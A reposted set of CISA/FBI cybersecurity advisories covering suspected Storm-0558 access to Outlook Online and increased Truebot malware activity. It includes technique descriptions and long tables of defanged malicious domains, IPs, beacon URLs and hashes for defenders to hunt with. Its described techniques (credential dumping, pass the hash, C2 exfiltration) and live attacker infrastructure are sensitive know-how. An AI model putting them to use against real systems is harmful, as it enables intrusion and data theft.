Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REFERENCES

[1] Citrix Security Bulletin CTX561482: Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467

Source de l’article sur us-cert.gov

20 July 2023/by Service comm.

Enhanced Monitoring to Detect APT Activity Targeting Outlook Online

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

SUMMARY

In June 2023, a Federal Civilian Executive Branch (FCEB) agency identified suspicious activity in their Microsoft 365 (M365) cloud environment. The agency reported the activity to Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA), and Microsoft determined that advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data.

CISA and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory to provide guidance to critical infrastructure organizations on enhancing monitoring of Microsoft Exchange Online environments. Organizations can enhance their cyber posture and position themselves to detect similar malicious activity by implementing logging recommendations in this advisory. Organizations that identify suspicious, anomalous activity should contact Microsoft for proceeding with mitigation actions due to the cloud-based infrastructure affected, as well as report to CISA and the FBI.

Download the PDF version of this report:

AA23-193A Enhanced Monitoring to Detect APT Activity Targeting Outlook Online (PDF, 414.66 KB )

TECHNICAL DETAILS

In Mid-June 2023, an FCEB agency observed MailItemsAccessed events with an unexpected ClientAppID and AppID in M365 Audit Logs. The MailItemsAccessed event is generated when licensed users access items in Exchange Online mailboxes using any connectivity protocol from any client. The FCEB agency deemed this activity suspicious because the observed AppId did not normally access mailbox items in their environment. The agency reported the activity to Microsoft and CISA.

Microsoft determined that APT actors accessed and exfiltrated unclassified Exchange Online Outlook data from a small number of accounts. The APT actors used a Microsoft account (MSA) consumer key to forge tokens to impersonate consumer and enterprise users. Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse.[1]

The affected FCEB agency identified suspicious activity by leveraging enhanced logging—specifically of MailItemsAccessed events—and an established baseline of normal Outlook activity (e.g., expected AppID). The MailItemsAccessed event enables detection of otherwise difficult to detect adversarial activity.

CISA and FBI are not aware of other audit logs or events that would have detected this activity. Critical infrastructure organizations are strongly urged to implement the logging recommendations in this advisory to enhance their cybersecurity posture and position themselves to detect similar malicious activity.

LOGGING

CISA and the FBI strongly encourage critical infrastructure organizations to ensure audit logging is enabled. Note: Per CISA’s Microsoft Exchange Online Microsoft 365 Minimum Viable Secure Configuration Baselines, FCEB agencies shall enable audit logging. These minimum viable secure configuration baselines are part of CISA’s Secure Cloud Business Applications (SCuBA) Project, which provides guidance for FCEB agencies securing their cloud business application environments and protecting federal information created, accessed, shared, and stored in those environments. Although tailored to FCEB agencies, the project provides security guidance applicable to all organizations with cloud environments. The Office of Management and Budget (OMB) M-21-31 requires Microsoft audit logs be retained for at least twelve months in active storage and an additional eighteen months in cold storage. This can be accomplished either by offloading the logs out of the cloud environment or natively through Microsoft by creating an audit log retention policy.

In addition to enabling audit logging, CISA and FBI strongly encourage organizations to:

Enable Purview Audit (Premium) logging. This logging requires licensing at the G5/E5 level. See Microsoft’s guidance on Assigning Microsoft 365 Licenses to Users for additional information.
Ensure logs are searchable by operators. The relevant logs need to be accessible to operational teams in a platform (e.g., security operations center [SOC] tooling) that enables hunting for this activity and distinguishing it from expected behavior within the environment.
Enable Microsoft 365 Unified Audit Logging (UAL). UAL should be enabled by default, but organizations are encouraged to validate these settings.
Understand your organization’s cloud baseline. Organizations are encouraged to look for outliers and become familiar with baseline patterns to better understand abnormal versus normal traffic.

GENERAL CLOUD MITIGATIONS

All mitigation actions for this activity are the responsibility of Microsoft due to the cloud-based infrastructure affected; however, CISA and the FBI recommend that critical infrastructure organizations implement the following to harden their cloud environments. Although, these mitigations will not prevent this or related activity where actors leverage compromised consumer keys, they will reduce the impact of less sophisticated malicious activity targeting cloud environments. Note: These mitigations align with CISA’s SCuBA Technical Reference Architecture (TRA), which describes essential components of security services and capabilities to secure and harden cloud business applications, including the platforms hosting the applications.

Apply CISA’s recommended baseline security configurations for Microsoft Defender for Office 365, Azure Active Directory, Exchange Online, OneDrive for Business, Power BI, Power Platform, SharePoint Online, and Teams [SCuBA TRA Section 6.6].
Separate administrator accounts from user accounts according to the National Institute of Standards and Technology’s (NIST’s) guidance, AC-5: Separation of Duties. Only allow designated administrator accounts to be used for administration purposes. If an individual user requires administrative rights over their workstation, use a separate account without administrative access to other hosts.
Collect and store access and security logs for secure cloud access (SCA) solutions, endpoint solutions, cloud applications/platforms and security services, such as firewalls, data loss prevention systems, and intrusion detection systems [SCuBA TRA Section 6.8.1].
Use a telemetry hosting solution (e.g., SIEM solution) that aggregates logs and telemetry data to facilitate internal organization monitoring, auditing, alerting, and threat detection activities [SCuBA TRA Section 6.8.1].
Review contractual relationships with all Cloud Service Providers (CSPs) and ensure contracts include:
- Security controls the customer deems appropriate.
- Appropriate monitoring and logging of provider-managed customer systems.
- Appropriate monitoring of the service provider’s presence, activities, and connections to the customer network.
- Notification of confirmed or suspected activity.

REPORTING SUSPICIOUS ACTIVITY

Organizations are encouraged to report suspicious activity to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or IC3.gov.

RESOURCES

CISA: Microsoft Exchange Online Microsoft 365 Minimum Viable Secure Configuration Baselines
CISA: SCuBA Project
Microsoft: Assigning Microsoft 365 Licenses to Users
CISA: SCuBA TRA
CISA: Recommended Baseline Security Configurations (Microsoft)
NIST: AC-5: Separation of Duties

REFERENCES

[1] Microsoft Security Response Center (MSRC) blog: Microsoft mitigates China-based threat actor Storm-0558 targeting of customer email

ACKNOWLEDGEMENTS

Microsoft contributed to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. The FBI, and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI and CISA.

Source de l’article sur us-cert.gov

11 July 2023/by Service comm.

Increased Truebot Activity Infects U.S. and Canada Based Networks

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Canadian Centre for Cyber Security (CCCS) are releasing this joint Cybersecurity Advisory (CSA) in response to cyber threat actors leveraging newly identified Truebot malware variants against organizations in the United States and Canada. As recently as May 31, 2023, the authoring organizations have observed an increase in cyber threat actors using new malware variants of Truebot (also known as Silence.Downloader). Truebot is a botnet that has been used by malicious cyber groups like CL0P Ransomware Gang to collect and exfiltrate information from its target victims.

Previous Truebot malware variants were primarily delivered by cyber threat actors via malicious phishing email attachments; however, newer versions allow cyber threat actors to also gain initial access through exploiting CVE-2022-31199—(a remote code execution vulnerability in the Netwrix Auditor application), enabling deployment of the malware at scale within the compromised environment. Based on confirmation from open-source reporting and analytical findings of Truebot variants, the authoring organizations assess cyber threat actors are leveraging both phishing campaigns with malicious redirect hyperlinks and CVE-2022-31199 to deliver new Truebot malware variants.

The authoring organizations recommend hunting for the malicious activity using the guidance outlined in this CSA, as well as applying vendor patches to Netwrix Auditor (version 10.5—see Mitigations section below).[1] Any organization identifying indicators of compromise (IOCs) within their environment should urgently apply the incident responses and mitigation measures detailed in this CSA and report the intrusion to CISA or the FBI.

Download the PDF version of this report:

AA23-187A Increased Truebot Activity Infects U.S. and Canada Based Networks (PDF, 869.59 KB )

Read the associated Malware Analysis Report MAR-10445155-1.v1 Truebot Activity Infects U.S. and Canada Based Networks or download the PDF version below:

MAR-10445155-1.v1 Truebot Activity Infects U.S. and Canada Based Networks (PDF, 315.39 KB )

For a downloadable copy of IOCs in .xml and .json format, see:

AA23-187A STIX XML (XML, 204.54 KB )

AA23-187A STIX JSON (JSON, 140.24 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section below for cyber threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access and Execution

In recent months, open source reporting has detailed an increase in Truebot malware infections, particularly cyber threat actors using new tactics, techniques, and procedures (TTPs), and delivery methods.[2] Based on the nature of observed Truebot operations, the primary objective of a Truebot infection is to exfiltrate sensitive data from the compromised host(s) for financial gain [TA0010].

Phishing:
- Cyber threat actors have historically used malicious phishing emails as the primary delivery method of Truebot malware, which tricks recipients into clicking a hyperlink to execute malware. Cyber threat actors have further been observed concealing email attachments (executables) as software update notifications [T1189] that appear to be legitimate [T1204.002], [T1566.002]. Following interaction with the executable, users will be redirected to a malicious web domain where script files are then executed. Note: Truebot malware can be hidden within various, legitimate file formats that are used for malicious purposes [T1036.008].[3]
Exploitation of CVE-2022-31199:
- Though phishing remains a prominent delivery method, cyber threat actors have shifted tactics, exploiting, in observable manner, a remote code execution vulnerability (CVE-2022-31199) in Netwrix Auditor [T1190]—software used for on-premises and cloud-based IT system auditing. Through exploitation of this CVE, cyber threat actors gain initial access, as well as the ability to move laterally within the compromised network [T1210].

*Figure 1: CVE-2022-3199 Delivery Method for Truebot*

Following the successful download of the malicous file, Truebot renames itself and then loads FlawedGrace onto the host. Please see the FlawedGrace section below for more information on how this remote access tool (RAT) is used in Truebot operations.

After deployment by Truebot, FlawedGrace is able to modify registry [T1112] and print spooler programs [T1547.012] that control the order that documents are loaded to a print queue. FlawedGrace manipulates these features to both escalate privilege and establish persistence.

During FlawedGrace’s execution phase, the RAT stores encrypted payloads [T1027.009] within the registry. The tool can create scheduled tasks and inject payloads into msiexec.exe and svchost.exe, which are command processes that enable FlawedGrace to establish a command and control (C2) connection to 92.118.36[.]199, for example, as well as load dynamic link libraries (DLLs) [T1055.001] to accomplish privilege escalation.

Several hours post initial access, Truebot has been observed injecting Cobalt Strike beacons into memory [T1055] in a dormant mode for the first few hours prior to initiating additional operations. Please see the Cobalt Strike section below for more information on how this remote access tool (RAT) is used in Truebot operations.

Discovery and Defense Evasion

During the first stage of Truebot’s execution process, it checks the current version of the operating system (OS) with RtlGetVersion and processor architecture using GetNativeSystemInfo [T1082].[4] Note: This variant of Truebot malware is designed with over one gigabyte (GB) of junk code which functions to hinder detection and analysis efforts [T1027.001].

Following the initial checks for system information, Truebot has the capability to enumerate all running processes [T1057], collect sensitive local host data [T1005], and send this data to an encoded data string described below for second-stage execution. Based on IOCs in table 1, Truebot also has the ability to discover software security protocols and system time metrics, which aids in defense evasion, as well as enables synchronization with the compromised system’s internal clock to facilitate scheduling tasks [T1518.001][T1124].

Next, it uses a .JSONIP extension, (e.g., IgtyXEQuCEvAM.JSONIP), to create a thirteen character globally unique identifier (GUID)—a 128-bit text string that Truebot uses to label and organize the data it collects [T1036].

After creating the GUID, Truebot compiles and enumerates running process data into either a base64 or unique hexadecimal encoded string [T1027.001]. Truebot’s main goal is identifying the presence of security debugger tools. However, the presence of identified debugger tools does not change Truebot’s execution process—the data is compiled into a base64 encoded string for tracking and defense evasion purposes [T1082][T1622].

Data Collection and Exfiltration

Following Truebot’s enumeration of running processes and tools, the affected system’s computer and domain name [T1082][T1016], along with the newly generated GUID, are sent to a hard-coded URL in a POST request (as observed in the user-agent string). Note: A user-agent string is a customized HTTP request that includes specific device information required for interaction with web content. In this instance, cyber threat actors can redirect victims to malicious domains and further establish a C2 connection.

The POST request functions as means for establishing a C2 connection for bi-lateral communication. With this established connection, Truebot uses a second obfuscated domain to receive additional payloads [T1105], self-replicate across the environment [T1570], and/or delete files used in its operations [T1070.004]. Truebot malware has the capability to download additional malicious modules [T1105], load shell code [T1620], and deploy various tools to stealthily navigate an infected network.

Associated Delivery Vectors and Tools

Truebot has been observed in association with the following delivery vectors and tools:

Raspberry Robin (Malware)

Raspberry Robin is a wormable malware with links to other malware families and various infection methods, including installation via USB drive [T1091].[5] Raspberry Robin has evolved into one of the largest malware distribution platforms and has been observed deploying Truebot, as well as other post-compromise payloads such as IcedID and Bumblebee malware.[6] With the recent shift in Truebot delivery methods from malicious emails to the exploitation of CVE-2022-31199, a large number of Raspberry Robin infections have leveraged this exploitable CVE.[2]

Flawed Grace (Malware)

FlawedGrace is a remote access tool (RAT) that can receive incoming commands [T1059] from a C2 server sent over a custom binary protocol [T1095] using port 443 to deploy additional tools [T1105].[7] Truebot malware has been observed leveraging (and dropping) FlawedGrace via phishing campaigns as an additional payload [T1566.002].[8] Note: FlawedGrace is typically deployed minutes after Truebot malware is executed.

Cobalt Strike (Tool)

Cobalt Strike is a popular remote access tool (RAT) that cyber threat actors have leveraged—in an observable manner—for a variety of post-exploitation means. Typically a few hours after Truebot’s execution phase, cyber threat actors have been observed deploying additional payloads containing Cobalt Strike beacons for persistence and data exfiltration purposes [T1059].[2] Cyber threat actors use Cobalt Strike to move laterally via remote service session hijacking [T1563.001][T1563.002], collecting valid credentials through LSASS memory credential dumping, or creating local admin accounts to achieve pass the hash alternate authentication [T1003.001][T1550.002].

Teleport (Tool)

Cyber threat actors have been observed using a custom data exfiltration tool, which Talos has named “Teleport.”[2] Teleport is known to evade detection during data exfiltration by using an encryption key hardcoded in the binary and a custom communication protocol [T1095] that encrypts data using advanced encryption standard (AES) and a hardcoded key [T1048][T1573.002]. Furthermore, to maintain its stealth, Teleport limits the data it collects and syncs with outbound organizational data/network traffic [T1029][T1030].

Truebot Malware Indicators of Compromise (IOCs)

Truebot IOCs from May 31, 2023, contain IOCs from cyber threat actors conducting Truebot malspam campaigns. Information is derived from a trusted third party, they observed cyber threat actors from 193.3.19[.]173 (Russia) using a compromised local account to conduct phishing campaigns on May 23, 2023 and spread malware through: https[:]//snowboardspecs[.]com/nae9v, which then promptly redirects the user to: https://www.meditimespharma[.]com/gfghthq/, which a trusted third party has linked to other trending Truebot activity.

After redirecting to https://www.meditimespharma[.]com/gfghthq/, trusted third parties have observed, the cyber threat actors using Truebot to pivot to https://corporacionhardsoft[.]com/images/2/Document_16654.exe, which is a domain associated with snowboardspecs[.]com, as well as malicious phishing campaigns in May 2023 and flagged my numerous security vendors, according to trusted third party reporting. Note: these IOCs are associated with Truebot campaigns used by Graceful Spider to deliver FlawedGrace and LummaStealer payloads in May of 2023.

The malicious file MD5 hash, 6164e9d297d29aa8682971259da06848 is associated with multiple Truebot rooted attack vectors and malware families, and was downloaded from https://corporacionhardsoft.com/images/2/Document_16654[.]exe which was flagged as malicious by numerous security vendors, and during its execution, the malware copies itself to C:IntelRuntimeBroker.exe, and based on trusted third party analysis, is linked to https://essadonio.com/538332[.]php, which is linked to 45.182.189[.]71 (Panama) and is associated with other trending Truebot malware campaigns from May 2023.

Please reference table 1 for IOCs described in the paragraph above.

Table 1: Truebot IOCs from May of 2023
Indicator Type	Indicator	Source
Registrant	GKG[.]NET Domain Proxy Service Administrator	Trusted Third Party
Compromised Account Created:	2022-04-10	Trusted Third Party
Malicious account created	1999-11-09	Trusted Third Party
IP	193.3.19[.]173 (Russia)	Trusted Third Party
URL	https://snowboardspecs[.]com/nae9v	Trusted Third Party
Domain	https://corporacionhardsoft[.]com/images/2/Document_16654.exe	Trusted Third Party
File	Document_16654[.]exe	Trusted Third Party
MD5 Hash	6164e9d297d29aa8682971259da06848	Trusted Third Party
File	Document_may_24_16654[.]exe	Trusted Third Party
File	C:IntelRuntimeBroker[.]exe	Trusted Third Party
URL	https://essadonio.com/538332[.]php	Trusted Third Party
IP	45.182.189[.]71 (Panama)	Trusted Third Party
Account Created	2023-05-18	Trusted Third Party

Table 2: Truebot malware IOCs from May of 2023
Indicator Type	Indicator	Source
URL	Secretsdump[.]py#l374	A Truly Graceful Wipe Out
Domain	Secretsdump[.]py	A Truly Graceful Wipe Out
Domain	Imsagentes[.]pe	A Truly Graceful Wipe Out
URL	https://imsagentes[.]pe/dgrjfj/	A Truly Graceful Wipe Out
URL	https://imsagentes[.]pe/dgrjfj	A Truly Graceful Wipe Out
URL	https://hrcbishtek[.]com/{5	A Truly Graceful Wipe Out
URL	https://ecorfan.org/base/sj/document_may_24_16654[.]exe	A Truly Graceful Wipe Out
Domain	Hrcbishtek[.]com	A Truly Graceful Wipe Out
File	F33734DFBBFF29F68BCDE052E523C287	A Truly Graceful Wipe Out
File	F176BA63B4D68E576B5BA345BEC2C7B7	A Truly Graceful Wipe Out
File	F14F2862EE2DF5D0F63A88B60C8EEE56	A Truly Graceful Wipe Out
Domain	Essadonio[.]com	A Truly Graceful Wipe Out
Domain	Ecorfan[.]org	A Truly Graceful Wipe Out
File	C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3	A Truly Graceful Wipe Out
Domain	Atexec[.]py	A Truly Graceful Wipe Out
File	A0E9F5D64349FB13191BC781F81F42E1	A Truly Graceful Wipe Out
IPv4	92.118.36[.]199	A Truly Graceful Wipe Out
IPv4	81.19.135[.]30	A Truly Graceful Wipe Out
File	72A589DA586844D7F0818CE684948EEA	A Truly Graceful Wipe Out
File	717BEEDCD2431785A0F59D194E47970E9544FBF398D462A305F6AD9A1B1100CB	A Truly Graceful Wipe Out
IPv4	5.188.86[.]18	A Truly Graceful Wipe Out
IPv4	5.188.206[.]78	A Truly Graceful Wipe Out
IPv4	45.182.189[.]71	A Truly Graceful Wipe Out
IPv4	139.60.160[.]166	A Truly Graceful Wipe Out
File	121A1F64FFF22C4BFCEF3F11A23956ED403CDEB9BDB803F9C42763087BD6D94E	A Truly Graceful Wipe Out

Table 3: Truebot IOCs from May 2023 (Malicious Domains, and Associated IP addresses and URLs)
Malicious Domain	Associated IP(s)	Beacon URL
nitutdra[.]com	46.161.40[.]128
romidonionhhgtt[.]com	46.161.40.128
midnigthwaall[.]com	46.161.40[.]128
dragonetzone[.]com	46.161.40[.]128	hxxps://dragonetzone[.]com/gate_info[.]php
rprotecruuio[.]com	45.182.189[.]71
essadonio[.]com	45.182.189[.]71	hxxps://nomoresense[.]com/checkinfo[.]php
nomoresense[.]com	45.182.189[.]91	hxxps://nomoresense[.]com/checkinfo[.]php
ronoliffuion[.]com	45.182.189[.]120	hxxps://ronoliffuion[.]com/dns[.]php
bluespiredice[.]com	45.182.189[.]119
dremmfyttrred[.]com	45.182.189[.]103	hxxps://dremmfyttrred[.]com/dns[.]php
ms-online-store[.]com	45.227.253[.]102
ber6vjyb[.]com	92.118.36[.]252	hxxps://ber6vjyb[.]com/dns[.]php
jirostrogud[.]com	88.214.27[.]101	hxxps://ber6vjyb[.]com/dns[.]php
fuanshizmo[.]com	45.182.189[.]229
qweastradoc[.]com	92.118.36[.]213	hxxp://nefosferta[.]com/gate[.]php
qweastradoc[.]com	92.118.36[.]213	hxxp://nefosferta[.]com/gate[.]php
qweastradoc[.]com	92.118.36[.]213	hxxp://nefosferta[.]com/gate[.]php
hiperfdhaus[.]com	88.214.27[.]100	hxxp://nefosferta[.]com/gate[.]php
guerdofest[.]com	45.182.189[.]228	hxxp://qweastradoc[.]com/gate[.]php
nefosferta[.]com	179.60.150[.]139	hxxp://nefosferta[.]com/gate[.]php

*Table* 4: Truebot IOCs from May 2023 Continued (Malicious Domains and Associated Hashes)
Malicious Domain	MD5	SHA1	SHA256
nitutdra[.]com
romidonionhhgtt[.]com
midnigthwaall[.]com
dragonetzone[.]com	64b27d2a6a55768506a5658a31c045de	c69f080180430ebf15f984be14fb4c76471cd476	e0178ab0893a4f25c68ded11e74ad90403443e413413501d138e0b08a910471e
rprotecruuio[.]com
essadonio[.]com	9a3bad7d8516216695887acc9668cda1	a89c097138e5aab1f35b9a03900600057d907690	4862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0
essadonio[.]com	6164e9d297d29aa8682971259da06848	96b95edc1a917912a3181d5105fd5bfad1344de0	717beedcd2431785a0f59d194e47970e9544fbf398d462a305f6ad9a1b1100cb
nomoresense[.]com	8f924f3cbe5d8fe3ecb7293478901f1a	516051b4cab1be74d32a6c446eabac7fc354904f	6b646641c823414c2ee30ae8b91be3421e4f13fa98e2d99272956e61eecfc5a1
nomoresense[.]com	ac6a2f1eafaae9f6598390d1017dd76c	1c637c2ded5d3a13fd9b56c35acf4443f308be52	f9f649cb5de27f720d58aa44aec6d0419e3e89f453730e155067506ad3ece638
ronoliffuion[.]com	881485ac77859cf5aaa8e0d64fbafc5f	51be660a3bdaab6843676e9d3b2af8444e88bbda	36d89f0455c95f9b00a8cea843003d0b53c4e33431fe57b5e6ec14a6c2e00e99
bluespiredice[.]com
dremmfyttrred[.]com	e4a42cbda39a20134d6edcf9f03c44ed	afda13d5365b290f7cdea701d00d05b0c60916f8	47f962063b42de277cd8d22550ae47b1787a39aa6f537c5408a59b5b76ed0464
dremmfyttrred[.]com	aa949d1a7ebe5f878023c6cfb446e29b	06057d773ad04fda177f6b0f6698ddaa47f7168a	594ade1fb42e93e64afc96f13824b3dbd942a2cdbc877a7006c248a38425bbc1
dremmfyttrred[.]com	338476c2b0de4ee2f3e402f3495d0578	03916123864aa034f7ca3b9d45b2e39b5c91c502	a67df0a8b32bdc5f9d224db118b3153f66518737e702314873b673c914b2bb5c
ms-online-store[.]com
ber6vjyb[.]com	46fe07c07fd0f45ba45240ef9aae2a44	b918f97c7c6ebc9594de3c8f2d9d75ecc292d02b	c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125
jirostrogud[.]com	89c8afc5bbd34f160d8a2b7218b9ca4a	16ecf30ff8c7887037a17a3eaffcb17145b69160	5cc8c9f2c9cee543ebac306951e30e63eff3ee103c62dadcd2ce43ef68bc7487
jirostrogud[.]com	5da364a8efab6370a174736705645a52	792623e143ddd49c36f6868e948febb0c9e19cd3	80b9c5ec798e7bbd71bbdfffab11653f36a7a30e51de3a72c5213eafe65965d9
fuanshizmo[.]com
qweastradoc[.]com	ee1ccb6a0e38bf95e44b73c3c46268c5	62f5a16d1ef20064dd78f5d934c84d474aca8bbe	0e3a14638456f4451fe8d76fdc04e591fba942c2f16da31857ca66293a58a4c3
qweastradoc[.]com	82d4025b84cf569ec82d21918d641540	bb32c940f9ca06e7e8533b1d315545c3294ee1a0	c042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c
qweastradoc[.]com	dbecfe9d5421d319534e0bfa5a6ac162	9e7a2464f53ce74d840eb84077472bc29fd1ba05	c9b874d54c18e895face055eeb6faa2da7965a336d70303d0bd6047bec27a29d
qweastradoc[.]com	b7fed593e8eb3646f876367b56725e6c	44090a7858eceb28bc111e1edd2f0dc98047afb2	ff8c8c8bfba5f2ba2f8003255949678df209dbff95e16f2f3c338cfa0fd1b885
hiperfdhaus[.]com	8e2b823aac6c9e11fcabecb1d8c19adf	77ad34334a370d85ca5e77436ed99f18b185eee3	a30e1f87b78d1cd529fbe2afdd679c8241d3baab175b2f083740263911a85304
hiperfdhaus[.]com	8a94163ddf956abd0ea92d89db0034e5	abc96032071adeb6217f0a5ba1aff55dc11f5438	b95a764820e918f42b664f3c9a96141e2d7d7d228da0edf151617fabdd9166cf
guerdofest[.]com	65fb9572171b903aa31a325f550d8778	d8bd44b7a8f136e29b31226f4edf566a4223266c	d5bbcaa0c3eeea17f12a5cc3dbcaffff423d00562acb694561841bcfe984a3b7
nefosferta[.]com	d9d85bdb6a3ac60a8ba6776c661dbace	78e38e522b1765efb15d0585e13c1f1301e90788	092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875
nefosferta[.]com	20643549f19bed9a6853810262622755	c8227dcc1cd6ecc684de8c5ea9b16e3b35f613f1	1ef8cdbd3773bd82e5be25d4ba61e5e59371c6331726842107c0f1eb7d4d1f49
nefosferta[.]com	e9299fc9b7daa0742c28bfc4b03b7b25	77360abc473dc65c8bdd73b6459b9ea8fddb6f1d	22e3f4602a258e92a0b8deb5a2bd69c67f4ac3ca67362a745178848a9da7a3cc
nefosferta[.]com	775fb391db27e299af08933917a3acda	eaaa5e68956a3a3f6113e965199f479e10ae9956	2d50b03a92445ba53ae147d0b97c494858c86a56fe037c44bc0edabb902420f7
nefosferta[.]com	f4045710c99d347fe6dfa2c0fcadde29	b7bffdbbaf817d149bbd061070a2d171449afbfc	32ae88cddeeeec255d6d9c827f6bffc7a95e9ea7b83a84a79ff793735a4b4ed7
nefosferta[.]com	587acecdb9491e0897d1067eb02e7c8d	a9eb1ac4b85d17da3a2bae5835c7e862d481c189	55d1480cd023b74f10692c689b56e7fd6cc8139fb6322762181daead55a62b9e
nefosferta[.]com	0bae65245e5423147fce079de29b6136	f24232330e6f428bfbb6b9d8154db1c4046c2fc2	6210a9f5a5e1dc27e68ecd61c092d2667609e318a95b5dade3c28f5634a89727
nefosferta[.]com	5022a85b39a75ebe2bc0411d7b058b2e	a9040ac0e9f482454e040e2a7d874ddc50e6f6ce	68a86858b4638b43d63e8e2aaec15a9ebd8fc14d460dd74463db42e59c4c6f89
nefosferta[.]com	6a2f114a8995dbeb91f766ac2390086e	edac3cf9533b6f7102f6324fadb437a0814cc680	72813522a065e106ac10aa96e835c47aa9f34e981db20fa46a8f36c4543bb85d
nefosferta[.]com	e9115cc3280c16f9019e0054e059f4b8	dad01b0c745649c6c8b87dbeb7ab549ed039515d	7a64bc69b60e3cd3fd00d4424b411394465640f499e56563447fe70579ccdd00
nefosferta[.]com	b54cc9a3dd88e478ea601dfd5b36805e	318fdfec4575d1530a41c80274aa8caae7b7f631	7c607eca4005ba6415e09135ef38033bb0b0e0ff3e46d60253fc420af7519347
nefosferta[.]com	f129c12b1bda7426f6b31682b42ee4b0	5bb804153029c97fe23517ae5428a591c3c63f28	7c79ec3f5c1a280ffdf19d0000b4bfe458a3b9380c152c1e130a89de3fe04b63
nefosferta[.]com	f68aa4c92dd30bd5418f136aaf6c07d6	aa56f43e39d114235a6b1d5f66b593cc80325fa4	7e39dcd15307e7de862b9b42bf556f2836bf7916faab0604a052c82c19e306ca
nefosferta[.]com	acac995cee8a6a75fa79eb41bdffa53f	971a00a392b99f64a3886f40b6ef991e62f0fe2f	97bae3587f1d2fd35f24eb214b9dd6eed95744bed62468d998c7ef55ff8726d4
nefosferta[.]com	36057710279d9f0d023cb5613aa76d5e	e4dd1f8fc4e44c8fd0e25242d994c4b59eed6939	97d0844ce9928e32b11706e06bf2c4426204d998cb39964dd3c3de6c5223fff0
nefosferta[.]com	37e6904d84153d1435407f4669135134	1dcd85f7364ea06cd595a86e3e9be48995d596e9	bf3c7f0ba324c96c9a9bff6cf21650a4b78edbc0076c68a9a125ebcba0e523c9
nefosferta[.]com	4f3916e7714f2a32402c9d0b328a2c91	87a692e3592f7b997c7d962919e243b665f2be36	c3743a8c944f5c9b17528418bf49b153b978946838f56e5fca0a3f6914bee887
nefosferta[.]com	d9daaa0df32b0bb01a09e500fc7f5881	f9cb839adba612db5884e1378474996b4436c0cd	c3b3640ddf53b26f4ebd4eedf929540edb452c413ca54d0d21cc405c7263f490
nefosferta[.]com	c87fb9b9f6c343670bed605420583418	f05cf0b026b2716927dac8bcd26a2719ea328964	c6c4f690f0d15b96034b4258bdfaf797432a3ec4f73fbc920384d27903143cb0
nefosferta[.]com	2be64efd0fa7739123b26e4b70e53c5c	318fdfec4575d1530a41c80274aa8caae7b7f631	ed38c454575879c2546e5fccace0b16a701c403dfe3c3833730d23b32e41f2fe

*Table* 5: Truebot IOCs Connected to Russia, and Panama Locations
Malicious Domain	IP Addresses	Files	SHA256
Dremmfyttrred[.]com
	45.182.189[.]103
	94.142.138[.]61
	172.64.155[.]188
	104.18.32[.]68
		Update[.]exe
		Document_26_apr_2443807[.]exe
		3ujwy2rz7v[.]exe
			fe746402c74ac329231ae1b5dffa8229b509f4c15a0f5085617f14f0c1579040
droogggdhfhf[.]com		3LXJyA6Gf[.]exe	7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 6-16 for all referenced cyber threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 6: Initial Access
Technique Title	ID	Use
Replication Through Removable Media	T1091	Cyber threat actors use removable media drives to deploy Raspberry Robin malware.
Drive-by Compromise	T1189	Cyber threat actors embed malicious links or attachments within web domains to gain initial access.
Exploit Public-Facing Application	T1190	Cyber threat actors are exploiting Netwrix vulnerability CVE-2022-31199 for initial access with follow-on capabilities of lateral movement through remote code execution.
Phishing	T1566.002	Truebot actors can send spear phishing links to gain initial access.

Table 7: Execution
Technique Title	ID	Use
Command and Scripting Interpreter	T1059	Cyber threat actors have been observed dropping cobalt strike beacons as a reverse shell proxy to create persistence within the compromised network. Cyber threat actors use FlawedGrace to receive PowerShell commands over a C2 channel to deploy additional tools.
Shared Modules	T1129	Cyber threat actors can deploy malicious payloads through obfuscated share modules.
User Execution: Malicious Link	T1204.001	Cyber threat actors trick users into clicking a link by making them believe they need to perform a Google Chrome software update.

Table 8: Persistence
Technique Title	ID	Use
Hijack Execution Flow: DLL Side-Loading	1574.002	Cyber threat actors use Raspberry Robin, among other toolsets to side-load DLLs to maintain persistence.

Table 9: Privilege Escalation
Technique Title	ID	Use
Boot or Logon Autostart Execution: Print Processors	T1547.012	FlawedGrace malware manipulates print spooler functions to achieve privilege escalation.

Table 10: Defense Evasion
Technique Title	ID	Use
Obfuscated Files or Information	T1027	Truebot uses a .JSONIP extension (e.g., IgtyXEQuCEvAM.JSONIP), to create a GUID.
Obfuscated Files or Information: Binary Padding	T1027.001	Cyber threat actors embed around one gigabyte of junk code within the malware string to evade detection protocols.
